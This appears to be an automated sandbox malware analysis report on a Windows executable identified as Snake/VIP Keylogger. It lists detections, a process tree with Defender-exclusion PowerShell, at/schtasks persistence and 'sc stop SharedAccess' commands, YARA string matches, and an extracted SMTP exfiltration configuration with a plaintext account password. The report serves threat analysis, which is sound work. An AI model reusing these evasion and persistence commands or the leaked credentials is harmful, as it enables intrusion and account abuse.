Edit tour

Windows Analysis Report
20250301_173245__P20250301_173245__P.exe

Overview

General Information

Sample name:	20250301_173245__P20250301_173245__P.exe
Analysis ID:	1629925
MD5:	561132fd4e322f2bff9d12ec9dc818cd
SHA1:	8a81db864d3ae60dbc267734328f444b8ee6864a
SHA256:	3a3d3d6ee6c705eb5cd66407edf6a27004dcdc8723994e0424f72eb0fa92c321
Tags:	exeuser-threatcat_ch
Infos:

Detection

CryptOne, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected CryptOne packer

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Creates an undocumented autostart registry key

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Injects a PE file into a foreign processes

Installs a global keyboard hook

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

PE file has a writeable .text section

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Interactive AT Job

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspect Svchost Activity

Sigma detected: System File Execution Location Anomaly

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a global mouse hook

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Common Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

20250301_173245__P20250301_173245__P.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe" MD5: 561132FD4E322F2BFF9D12EC9DC818CD)

20250301_173245__p20250301_173245__p.exe (PID: 7320 cmdline: c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe MD5: 1503EDCF019E30F945C81A7F1D5850B7)

powershell.exe (PID: 8012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dUENcAj.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8176 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmpFEE9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

20250301_173245__p20250301_173245__p.exe (PID: 7808 cmdline: "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe " MD5: 1503EDCF019E30F945C81A7F1D5850B7)

icsys.icn.exe (PID: 7348 cmdline: C:\Users\user\AppData\Local\icsys.icn.exe MD5: 07DCD5E2DC90E7271D53C7A68315DE01)

explorer.exe (PID: 7412 cmdline: c:\windows\system\explorer.exe MD5: B92B4ACBD6D3A22EDA265DC40B269F6E)

spoolsv.exe (PID: 7456 cmdline: c:\windows\system\spoolsv.exe SE MD5: AC754B63B54DECE23577C4E5AFBF3564)

svchost.exe (PID: 7488 cmdline: c:\windows\system\svchost.exe MD5: 8E00004AC7A742C170DD62E932E182C3)

spoolsv.exe (PID: 7512 cmdline: c:\windows\system\spoolsv.exe PR MD5: AC754B63B54DECE23577C4E5AFBF3564)

at.exe (PID: 7544 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 7608 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 7648 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 7728 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 7780 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 7852 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 7892 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 7972 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 8024 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 8096 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 8184 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 2640 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 2648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 4936 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 7548 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 5252 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 7656 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

at.exe (PID: 7740 cmdline: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 2AE20048111861FA09B709D3CC551AD6)

conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7736 cmdline: sc stop SharedAccess MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7812 cmdline: sc config Schedule start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7824 cmdline: sc start Schedule MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 7388 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dUENcAj.exe (PID: 8028 cmdline: C:\Users\user\AppData\Roaming\dUENcAj.exe MD5: 561132FD4E322F2BFF9D12EC9DC818CD)

duencaj.exe (PID: 4852 cmdline: c:\users\user\appdata\roaming\duencaj.exe MD5: 1503EDCF019E30F945C81A7F1D5850B7)

schtasks.exe (PID: 3716 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmp183D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

duencaj.exe (PID: 7888 cmdline: "c:\users\user\appdata\roaming\duencaj.exe " MD5: 1503EDCF019E30F945C81A7F1D5850B7)

duencaj.exe (PID: 7924 cmdline: "c:\users\user\appdata\roaming\duencaj.exe " MD5: 1503EDCF019E30F945C81A7F1D5850B7)

icsys.icn.exe (PID: 2816 cmdline: C:\Users\user\AppData\Local\icsys.icn.exe MD5: 07DCD5E2DC90E7271D53C7A68315DE01)

explorer.exe (PID: 560 cmdline: c:\windows\system\explorer.exe MD5: B92B4ACBD6D3A22EDA265DC40B269F6E)

explorer.exe (PID: 7712 cmdline: "C:\windows\system\explorer.exe" RO MD5: B92B4ACBD6D3A22EDA265DC40B269F6E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@javedan-battery.com", "Password": "infojb@dotcom", "Host": "mail.javedan-battery.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@javedan-battery.com", "Password": "infojb@dotcom", "Host": "mail.javedan-battery.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dd7a:$a1: get_encryptedPassword 0x2e0b7:$a2: get_encryptedUsername 0x2db8a:$a3: get_timePasswordChanged 0x2dc93:$a4: get_passwordField 0x2dd90:$a5: set_encryptedPassword 0x2f45c:$a7: get_logins 0x2f3a8:$a10: KeyLoggerEventArgs 0x2f00d:$a11: KeyLoggerEventArgsEventHandler
0000002E.00000002.2949149356.0000000002761000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ea5a:$a1: get_encryptedPassword 0x2ed97:$a2: get_encryptedUsername 0x2e86a:$a3: get_timePasswordChanged 0x2e973:$a4: get_passwordField 0x2ea70:$a5: set_encryptedPassword 0x3013c:$a7: get_logins 0x30088:$a10: KeyLoggerEventArgs 0x2fced:$a11: KeyLoggerEventArgsEventHandler
0000003F.00000002.2950015087.000000000321B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002E.00000002.2941527500.0000000000422000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xda6a:$a1: get_encryptedPassword 0xdda7:$a2: get_encryptedUsername 0xd87a:$a3: get_timePasswordChanged 0xd983:$a4: get_passwordField 0xda80:$a5: set_encryptedPassword 0xf14c:$a7: get_logins 0xf098:$a10: KeyLoggerEventArgs 0xecfd:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e43a:$a1: get_encryptedPassword 0x2e777:$a2: get_encryptedUsername 0x2e24a:$a3: get_timePasswordChanged 0x2e353:$a4: get_passwordField 0x2e450:$a5: set_encryptedPassword 0x2fb1c:$a7: get_logins 0x2fa68:$a10: KeyLoggerEventArgs 0x2f6cd:$a11: KeyLoggerEventArgsEventHandler
0000002E.00000002.2949149356.000000000286B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000003F.00000002.2941651605.0000000000434000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000003F.00000002.2950015087.0000000003111000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e9b2:$a1: get_encryptedPassword 0x2ecef:$a2: get_encryptedUsername 0x2e7c2:$a3: get_timePasswordChanged 0x2e8cb:$a4: get_passwordField 0x2e9c8:$a5: set_encryptedPassword 0x30094:$a7: get_logins 0x2ffe0:$a10: KeyLoggerEventArgs 0x2fc45:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e9aa:$a1: get_encryptedPassword 0x2ece7:$a2: get_encryptedUsername 0x2e7ba:$a3: get_timePasswordChanged 0x2e8c3:$a4: get_passwordField 0x2e9c0:$a5: set_encryptedPassword 0x3008c:$a7: get_logins 0x2ffd8:$a10: KeyLoggerEventArgs 0x2fc3d:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7320	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7320	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7320	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7320	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7320	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x23f4b:$a1: get_encryptedPassword 0x7aa43:$a1: get_encryptedPassword 0xc305d:$a1: get_encryptedPassword 0x2427e:$a2: get_encryptedUsername 0x7ad76:$a2: get_encryptedUsername 0xc3390:$a2: get_encryptedUsername 0x23d65:$a3: get_timePasswordChanged 0x7a85d:$a3: get_timePasswordChanged 0xc2e77:$a3: get_timePasswordChanged 0x23e6e:$a4: get_passwordField 0x7a966:$a4: get_passwordField 0xc2f80:$a4: get_passwordField 0x23f61:$a5: set_encryptedPassword 0x7aa59:$a5: set_encryptedPassword 0xc3073:$a5: set_encryptedPassword 0x2648c:$a7: get_logins 0x7cf84:$a7: get_logins 0xc559e:$a7: get_logins 0x263d8:$a10: KeyLoggerEventArgs 0x7ced0:$a10: KeyLoggerEventArgs 0xc54ea:$a10: KeyLoggerEventArgs
Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7808	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7808	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7808	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb7173:$a1: get_encryptedPassword 0xb74a6:$a2: get_encryptedUsername 0xb6f8d:$a3: get_timePasswordChanged 0xb7096:$a4: get_passwordField 0xb7189:$a5: set_encryptedPassword 0xb96b4:$a7: get_logins 0xb9600:$a10: KeyLoggerEventArgs 0xb9269:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: duencaj.exe PID: 4852	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: duencaj.exe PID: 4852	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: duencaj.exe PID: 4852	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: duencaj.exe PID: 4852	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: duencaj.exe PID: 4852	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x139db:$a1: get_encryptedPassword 0x68048:$a1: get_encryptedPassword 0x13d0e:$a2: get_encryptedUsername 0x6837b:$a2: get_encryptedUsername 0x137f5:$a3: get_timePasswordChanged 0x67e62:$a3: get_timePasswordChanged 0x138fe:$a4: get_passwordField 0x67f6b:$a4: get_passwordField 0x139f1:$a5: set_encryptedPassword 0x6805e:$a5: set_encryptedPassword 0x15f1c:$a7: get_logins 0x6a589:$a7: get_logins 0x15e68:$a10: KeyLoggerEventArgs 0x6a4d5:$a10: KeyLoggerEventArgs 0x15ad1:$a11: KeyLoggerEventArgsEventHandler 0x6a13e:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: duencaj.exe PID: 7924	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: duencaj.exe PID: 7924	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: duencaj.exe PID: 7924	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
46.2.20250301_173245__p20250301_173245__p.exe .400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dc6a:$a1: get_encryptedPassword 0x2dfa7:$a2: get_encryptedUsername 0x2da7a:$a3: get_timePasswordChanged 0x2db83:$a4: get_passwordField 0x2dc80:$a5: set_encryptedPassword 0x2f34c:$a7: get_logins 0x2f298:$a10: KeyLoggerEventArgs 0x2eefd:$a11: KeyLoggerEventArgsEventHandler
46.2.20250301_173245__p20250301_173245__p.exe .400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ba92:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b392:$a4: \Orbitum\User Data\Default\Login Data 0x3bd71:$a5: \Kometa\User Data\Default\Login Data
46.2.20250301_173245__p20250301_173245__p.exe .400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e8a2:$s1: UnHook 0x2e8a9:$s2: SetHook 0x2e8b1:$s3: CallNextHook 0x2e8be:$s4: _hook
1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2be6a:$a1: get_encryptedPassword 0x2c1a7:$a2: get_encryptedUsername 0x2bc7a:$a3: get_timePasswordChanged 0x2bd83:$a4: get_passwordField 0x2be80:$a5: set_encryptedPassword 0x2d54c:$a7: get_logins 0x2d498:$a10: KeyLoggerEventArgs 0x2d0fd:$a11: KeyLoggerEventArgsEventHandler
1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39c92:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39335:$a3: \Google\Chrome\User Data\Default\Login Data 0x39592:$a4: \Orbitum\User Data\Default\Login Data 0x39f71:$a5: \Kometa\User Data\Default\Login Data
1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2caa2:$s1: UnHook 0x2caa9:$s2: SetHook 0x2cab1:$s3: CallNextHook 0x2cabe:$s4: _hook
1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
57.2.duencaj.exe .3f0cd48.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
57.2.duencaj.exe .3f0cd48.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
57.2.duencaj.exe .3f0cd48.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
57.2.duencaj.exe .3f0cd48.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2be6a:$a1: get_encryptedPassword 0x2c1a7:$a2: get_encryptedUsername 0x2bc7a:$a3: get_timePasswordChanged 0x2bd83:$a4: get_passwordField 0x2be80:$a5: set_encryptedPassword 0x2d54c:$a7: get_logins 0x2d498:$a10: KeyLoggerEventArgs 0x2d0fd:$a11: KeyLoggerEventArgsEventHandler
1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2be6a:$a1: get_encryptedPassword 0x2c1a7:$a2: get_encryptedUsername 0x2bc7a:$a3: get_timePasswordChanged 0x2bd83:$a4: get_passwordField 0x2be80:$a5: set_encryptedPassword 0x2d54c:$a7: get_logins 0x2d498:$a10: KeyLoggerEventArgs 0x2d0fd:$a11: KeyLoggerEventArgsEventHandler
57.2.duencaj.exe .3f0cd48.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
